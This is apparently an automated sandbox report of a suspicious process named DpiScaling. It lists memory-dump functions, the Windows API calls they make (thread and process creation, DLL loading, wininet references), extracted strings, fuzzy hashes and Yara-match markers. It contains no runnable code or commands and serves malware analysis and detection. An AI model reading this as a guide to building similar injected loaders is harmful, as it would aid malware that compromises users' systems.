LdrInitializeThunk.NTDLL ref: 04772AFA

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 31dd11ecb8041731e0fc0142ed374a083b55d28f937a4e1670d84977c2663d7a
Instruction ID: 489a0a6c15bad506905ffa0f3b07c9496d0c32bd2025dc23592101f85a7eb28e
Opcode Fuzzy Hash: 31dd11ecb8041731e0fc0142ed374a083b55d28f937a4e1670d84977c2663d7a
Instruction Fuzzy Hash: 6C900235261400022155B658064450B04469BD63653D6C029F14175B4CC621D9655323

Function 04772AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772ADA

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7117bb59245992925de3f91788ac11a657c570b2422394ed481575d5c29c91f4
Instruction ID: 8231892a94baae3169f43f5980e6e246f211d36e0d171d6d58ffe542961ef4f6
Opcode Fuzzy Hash: 7117bb59245992925de3f91788ac11a657c570b2422394ed481575d5c29c91f4
Instruction Fuzzy Hash: 40900235251400032115B658074450700478BD5365396C035F1016574CD621D9615123

Function 04772B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772B6A

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7cb3ad536466f5491861ba1ff30fd6156cd9d088be0968744c16dad86b7e910c
Instruction ID: 08422f6b61ac7cacfb0317d5d4e943c205a12ba0a6f08ae372c031a6d4b0b983
Opcode Fuzzy Hash: 7cb3ad536466f5491861ba1ff30fd6156cd9d088be0968744c16dad86b7e910c
Instruction Fuzzy Hash: 7590027124240003611572584454616400B8BE0315B96C035E10155B4DC525D9916127

Function 04772BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772BFA

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c2eec1b55446ee03a1fbdbcbd7c1a006475fb170990ba000f4f044db9fea62b
Instruction ID: 0bf8f1ec4e36ebea0eab9a6da4957849036d27e50b269a2dfc85c3172e53e84a
Opcode Fuzzy Hash: 9c2eec1b55446ee03a1fbdbcbd7c1a006475fb170990ba000f4f044db9fea62b
Instruction Fuzzy Hash: 0A90023124140802F1907258444464A00068BD1315FD6C029A0026678DCA15DB5977A3

Function 04772BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772BEA

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e3d8a50d51f673b1f14a369fe275da44f5d1e705a0dfebe40c74f2dae7ff4096
Instruction ID: 98bd9f759cc293460e7f512b0d0d28f98d044e9b3ac18e09a557a417680009f0
Opcode Fuzzy Hash: e3d8a50d51f673b1f14a369fe275da44f5d1e705a0dfebe40c74f2dae7ff4096
Instruction Fuzzy Hash: 6C90023124544842F15072584444A4600168BD0319F96C025A00656B8D9625DE55B663

Function 04772BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772BAA

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 18948439d00b7636206c19fdde0f5b258ec0bd7f515e91e8f317f36a3f0c965b
Instruction ID: 9fb25676a1127e6cf271ae5f5076528be3bca8cb26cea9423c8866cf0b67af95
Opcode Fuzzy Hash: 18948439d00b7636206c19fdde0f5b258ec0bd7f515e91e8f317f36a3f0c965b
Instruction Fuzzy Hash: B990023164540802F1607258445474600068BD0315F96C025A0025678D8755DB5576A3

Function 047735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047735CA

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b001fcb3b9a4b9bbc44aca82b3bd29176997104c8ffaf5051b36c51215f5eeee
Instruction ID: fc9ab34518fdd0eda805abd78e1d4125ecbb524b94f5aee187d75880ad0b7fd5
Opcode Fuzzy Hash: b001fcb3b9a4b9bbc44aca82b3bd29176997104c8ffaf5051b36c51215f5eeee
Instruction Fuzzy Hash: 5A90023164550402F1107258455470610068BD0315FA6C425A042557CD8795DA5165A3

Function 047739B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047739BA

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b300dcd22679fb5ed564f3ac563adee199b61cc04672bb6b688f16fd1b0c8a0d
Instruction ID: 48370f791bd3dcf006516ae7947b2155c27c8119dd8183e80985a81492996131
Opcode Fuzzy Hash: b300dcd22679fb5ed564f3ac563adee199b61cc04672bb6b688f16fd1b0c8a0d
Instruction Fuzzy Hash: 7490023128545102F160725C44446164006ABE0315F96C035A08155B8D8555D9556223

Function 00689EF6 Relevance: 68.4, APIs: 1, Strings: 38, Instructions: 183
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00689EE5

Strings

2, xrefs: 0068A318
}, xrefs: 0068A37A
E&, xrefs: 00689F53
W+, xrefs: 0068A2DF
g/, xrefs: 0068A0FB
-Y, xrefs: 0068A119
,}, xrefs: 0068A254
Ei, xrefs: 00689F3F
L6, xrefs: 0068A191
S>, xrefs: 0068A1A5
sP, xrefs: 0068A123
DN, xrefs: 00689F2E
hh, xrefs: 0068A10F
(, xrefs: 0068A2A0
!, xrefs: 0068A370
<, xrefs: 0068A2F0
A, xrefs: 0068A204
R, xrefs: 00689F75
aK, xrefs: 0068A28B
Y, xrefs: 0068A0B5
5?, xrefs: 00689F1A
w+, xrefs: 0068A284
v, xrefs: 00689F89
fw, xrefs: 0068A20E
&3, xrefs: 0068A15F
y, xrefs: 0068A0BF
(Y, xrefs: 0068A218
Y~, xrefs: 0068A33F
XK, xrefs: 0068A187
|?, xrefs: 0068A1DC
B, xrefs: 0068A04F
P0, xrefs: 00689FD3
lK, xrefs: 0068A077
D[, xrefs: 0068A1D5
]>, xrefs: 00689FE7
+, xrefs: 0068A097
nT, xrefs: 0068A1F0
@, xrefs: 00689F6B

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID: ($!$&3$(Y$+$,}$-Y$2$5?$<$@$B$DN$D[$E&$Ei$L6$P0$R$S>$W+$XK$Y$Y~$]>$aK$fw$g/$hh$lK$nT$sP$v$w+$y$|?$}$A
API String ID: 2422867632-1221118759
Opcode ID: 140ffab47216fe8c4f2db974be672e91c492dcd6873cbe975c12394e1d87ba73
Instruction ID: eece03c4c97ae0bf87b0682c0844f148359ba887e8c14488ba197eb4518b0bd6
Opcode Fuzzy Hash: 140ffab47216fe8c4f2db974be672e91c492dcd6873cbe975c12394e1d87ba73
Instruction Fuzzy Hash: 59C167B0D457698BEB60CF41CD987DEBAB1BB05308F1081D9D55D3B281CBBA1A89CF85

Function 006A4230 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 006A430B

Strings

net.dll, xrefs: 006A42C7, 006A4356, 006A4336, 006A4342, 006A4362
wininet.dll, xrefs: 006A429E, 006A42AA

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 99f7a74124d33cefbeed0677e6789f5b7c70bb3758200ea244cef2f241e80bc8
Instruction ID: 9269c785667e32d2429180e1aa3aca80c438dff51179e6ec23bd80f3199a6e5e
Opcode Fuzzy Hash: 99f7a74124d33cefbeed0677e6789f5b7c70bb3758200ea244cef2f241e80bc8
Instruction Fuzzy Hash: 6B319CB1A01705BBDB14EFA4CC80FEAB7B9FB89310F10411CF61D6B241D7746A408BA4

Function 0069FCF9 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0069FD17
CoUninitialize.COMBASE ref: 0069FDFE

Strings

@J7<, xrefs: 0069FD2B

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 3d224e7d566675a3f7b763456524aeda7fc70de07abc4f24a7b2efe32419c9cf
Instruction ID: 0de42780af76ff3e25519d5c84a04d9d2f231f60b038b8934925a4dfe2ba5502
Opcode Fuzzy Hash: 3d224e7d566675a3f7b763456524aeda7fc70de07abc4f24a7b2efe32419c9cf
Instruction Fuzzy Hash: 543130B5A0020A9FDF00DFD8C8809EFB7BAFF89304B108559E505EB214D775EE058BA0

Function 0069FD00 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0069FD17
CoUninitialize.COMBASE ref: 0069FDFE

Strings

@J7<, xrefs: 0069FD2B

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: InitializeUninitialize
String ID: @J7<
API String ID: 3442037557-2016760708
Opcode ID: 4349142448911fd2e9266d6ccb03632ceac4a4103d81b4681d9751dbcd21cbc5
Instruction ID: b136a124d3e58e66ee6e4a0bcebcf10aecb4348de02b5d95d44e9c2213296636
Opcode Fuzzy Hash: 4349142448911fd2e9266d6ccb03632ceac4a4103d81b4681d9751dbcd21cbc5
Instruction Fuzzy Hash: 2B312FB5A0060AAFDB00DFD8C8809EEB7BAFF89304B118559E505EB215D775EE458BA0

Function 006A9F90 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00692289,?,o`j,00692289,006A5E1F,006A606F,?,00692289,006A5E1F,00001000,?,?,00000000), ref: 006A9FCF

Strings

o`j, xrefs: 006A9FBE, 006A9FCA

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: o`j
API String ID: 1279760036-1951446766
Opcode ID: 9e06ff782628825aa587294ec74bb5db90083e6f603c665925345a8da200af64
Instruction ID: 7a0dee736fed827c2d945b1d89b8cdcebdd880e2e1d2ab1223b5abe34b657b13
Opcode Fuzzy Hash: 9e06ff782628825aa587294ec74bb5db90083e6f603c665925345a8da200af64
Instruction Fuzzy Hash: 4FE06DB22002047BD614EF58DC45F9B37ADEFC9710F008519FA08A7242CA30B8118BB9

Function 00694D90 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00694E02

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 59b5cafe8b8fd6d07c39e63762b9fec7350b35de5028b9d2df728583a4312457
Instruction ID: 6ac97415e574a9fe7f3eeaa8b8cc2ace9e6e07fb4e671f9ed8c32d3058f786f7
Opcode Fuzzy Hash: 59b5cafe8b8fd6d07c39e63762b9fec7350b35de5028b9d2df728583a4312457
Instruction Fuzzy Hash: 6D011EB5D4020DABDF50EAE4DC42FDEB3B99F55308F004599E90897641FA31EB198B91

Function 006AA070 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,?,00698B7E,00000010,?,?,?,00000044,?,00000010,00698B7E,?,?,?), ref: 006AA0D0

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 01cd064d6552d5f2cf89f5c8ba85a2642588893491891f8a1591fcff336c04c6
Instruction ID: 60872f0ba779928d015d469ff850e3a13ad66ad48a614a8a2fb471b3bd1bd20f
Opcode Fuzzy Hash: 01cd064d6552d5f2cf89f5c8ba85a2642588893491891f8a1591fcff336c04c6
Instruction Fuzzy Hash: 6E0184B6204208BBCB44DF99DC81EDB77ADAF8D754F418208BA0DE7241D630FC518BA4

Function 00689EA0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00689EE5

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: b31fc47a371062e07bb7fe1983d695cd862d38e137e2d673d4986b5b4ddaad53
Instruction ID: cd4e9995571dd688ae8481b9f259cb7643bea87c2df56de15ddd95cff1391794
Opcode Fuzzy Hash: b31fc47a371062e07bb7fe1983d695cd862d38e137e2d673d4986b5b4ddaad53
Instruction Fuzzy Hash: 22F0653338030436E26075A99C42FD7769DDF85761F140529F70DEB1C1D9A5B94187E8

Function 00689E9A Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00689EE5

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 42446eb84e7ba486e32cc88a68cdd13209811338d34c734360c86a6a4f47cb54
Instruction ID: 09e8cd8b9192d0ddabd3b638abb84e437f346a38456894f3ad03f1d2ca32e0b6
Opcode Fuzzy Hash: 42446eb84e7ba486e32cc88a68cdd13209811338d34c734360c86a6a4f47cb54
Instruction Fuzzy Hash: FEF0653368030436E37176998C43FDBBA9DDF8A750F140519F709AB2C1D9A5B94187A8

Function 006A9FE0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,20F845C7,00000007,00000000,00000004,00000000,00694612,000000F4), ref: 006AA01F

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1c866616523e51831a820be1be8ce7b11f78220390593804b3664b45530813a9
Instruction ID: ee0e4793b64cb0c784b69ede92e5fd451806ae9208ccbb9b3112782335c1bf4d
Opcode Fuzzy Hash: 1c866616523e51831a820be1be8ce7b11f78220390593804b3664b45530813a9
Instruction Fuzzy Hash: D8E06DB12003047BD614EF59DC41E9B33ADEFC5710F408519FA08A7242CA31B8118BB9

Function 00698BC0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00698BEC

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c58293d32bd8147a900389bab75c9f72820fd2597aa2a7c120c298130393e55a
Instruction ID: e60e3e843ea9cb813c615c481a2380996f415629fda37d4d0ee299a5766ba771
Opcode Fuzzy Hash: c58293d32bd8147a900389bab75c9f72820fd2597aa2a7c120c298130393e55a
Instruction Fuzzy Hash: 7FE0DFB52403042AEB207AACDC46BB2334DDB5D724F088660B81C9F6D5E93CF9029254

Function 00698BB9 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00698BEC

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 417835fad04071081e364a1894cc7fe6599d9c3284dc07572dd3f426e4a491b3
Instruction ID: 3fca7d97a2dacd535f50441ede87968b40c52814c9fc3dc5ab4d3d9479bdab79
Opcode Fuzzy Hash: 417835fad04071081e364a1894cc7fe6599d9c3284dc07572dd3f426e4a491b3
Instruction Fuzzy Hash: A1E0D8B95403042BEB207A68CC46FB53359DB5D710F088610BC189F7D5E97CFA428654

Function 006989AF Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00692580,006A875F,006A5E1F,0069254D), ref: 006989E3

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c6acb38f5202aee68efdfd7af0fdb8825127a1c4e3bae3978b40d1703d33cdbe
Instruction ID: 84ac5e447c53f56ac78871164815c8d053dcb85d33868872a4dc8eb114f0651a
Opcode Fuzzy Hash: c6acb38f5202aee68efdfd7af0fdb8825127a1c4e3bae3978b40d1703d33cdbe
Instruction Fuzzy Hash: C1D02BB16883003EFB40F2B49C03F752A8D5B11300F04416CF50CEB3C3D898A5018B15

Function 006989B0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00692580,006A875F,006A5E1F,0069254D), ref: 006989E3

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 0e4c63df192a151cd85b9786be853329b84476a27646d05024dcba02b158ed13
Instruction ID: 8cb402cf0792dded804c5aa1b88c34d6f19c3f0f03b9360142740c8fb6a4645d
Opcode Fuzzy Hash: 0e4c63df192a151cd85b9786be853329b84476a27646d05024dcba02b158ed13
Instruction Fuzzy Hash: 1BD05EB16883043BFA40B6A8DC07F66368E9B15754F054068BA0CEB3C3ECA9F9518669

Function 0069165B Relevance: 1.5, APIs: 1, Instructions: 21threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111), ref: 00691667

Memory Dump Source

Source File: 0000000B.00000002.2676305264.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_680000_DpiScaling.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
Instruction ID: cb28e682a86511873a739163480e2d38ecd68d3aeba7cebcc2fd0fa448995eb6
Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
Instruction Fuzzy Hash: E4D02277B0010C3AAE1245D4ACC1DFFB72CEB85BA6F004063FF08E6140E6218D020BB0

Function 04772C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04772C24

Memory Dump Source

Source File: 0000000B.00000002.2678997893.0000000004700000.00000040.00001000.00020000.00000000.sdmp, Offset: 04700000, based on PE: true

Associated: 0000000B.00000002.2678997893.0000000004829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000482D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000B.00000002.2678997893.000000000489E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_4700000_DpiScaling.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d41b81d4beaa6721101bda6959acc7f217cd037c4e430c994ec0a2e7f551024a
Instruction ID: 527798fb45f2b0eb0f96600907c04641f696b066956c2e88f739408bf14bfb9b
Opcode Fuzzy Hash: d41b81d4beaa6721101bda6959acc7f217cd037c4e430c994ec0a2e7f551024a
Instruction Fuzzy Hash: 64B08C719014C085EB10B720060860639006B90300F56C061D2020261A0328D080E172

Non-executed Functions

Function 045C04E8 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2678798803.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_45c0000_DpiScaling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af3be82383f1745c3c86962c63616ef3f5a1f22672b3464158b5603cced095d7
Instruction ID: b0cc22b1feb8d7cd0df2f2413aa467aa0c9417b9b2d2a86cf8671a4f542d1333
Opcode Fuzzy Hash: af3be82383f1745c3c86962c63616ef3f5a1f22672b3464158b5603cced095d7
Instruction Fuzzy Hash: 4641DB70519F0D8FD368AFE99081676B3E1FF85304F50052DD59AC3292E774F8468745

Function 045CDE89 Relevance: 56.5, Strings: 45, Instructions: 212COMMON

Download Yara Rule

Strings

@@@@, xrefs: 045CE061
@@@@, xrefs: 045CDF8F
-./0, xrefs: 045CDF81
)*+,, xrefs: 045CDF7A
@@@@, xrefs: 045CDF57
89:;, xrefs: 045CDF11
@@@@, xrefs: 045CE06F
4567, xrefs: 045CDF0A
@@@@, xrefs: 045CDFCE
@@@@, xrefs: 045CDFB2
123@, xrefs: 045CDF88
%&'(, xrefs: 045CDF73
@@@@, xrefs: 045CDF9D
@@@@, xrefs: 045CE068
@@@@, xrefs: 045CE022
@@@@, xrefs: 045CDFA4
@@@@, xrefs: 045CE030
@@@@, xrefs: 045CDF96
@@@@, xrefs: 045CE006
@@@?, xrefs: 045CDF03
@@@@, xrefs: 045CE045
@@@@, xrefs: 045CDFDC
@@@@, xrefs: 045CE037
@@@@, xrefs: 045CE014
@@@@, xrefs: 045CDFFF
@@@@, xrefs: 045CDFF8
@@@@, xrefs: 045CE029
@@@@, xrefs: 045CE04C
@@@@, xrefs: 045CDFC7
@@@@, xrefs: 045CE05A
@@@@, xrefs: 045CDFE3
@@@@, xrefs: 045CDFF1
!"#$, xrefs: 045CDF6C
@@@@, xrefs: 045CE053
@@@@, xrefs: 045CE00D
@@@@, xrefs: 045CDF1F
@@@@, xrefs: 045CE01B
@@@@, xrefs: 045CDFB9
@@@@, xrefs: 045CDFD5
<=@@, xrefs: 045CDF18
@@@@, xrefs: 045CDFEA
?, xrefs: 045CE080
@@@@, xrefs: 045CDFAB
@@@@, xrefs: 045CDFC0
@@@@, xrefs: 045CE03E

Memory Dump Source

Source File: 0000000B.00000002.2678798803.00000000045C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_45c0000_DpiScaling.jbxd

Similarity

API ID:
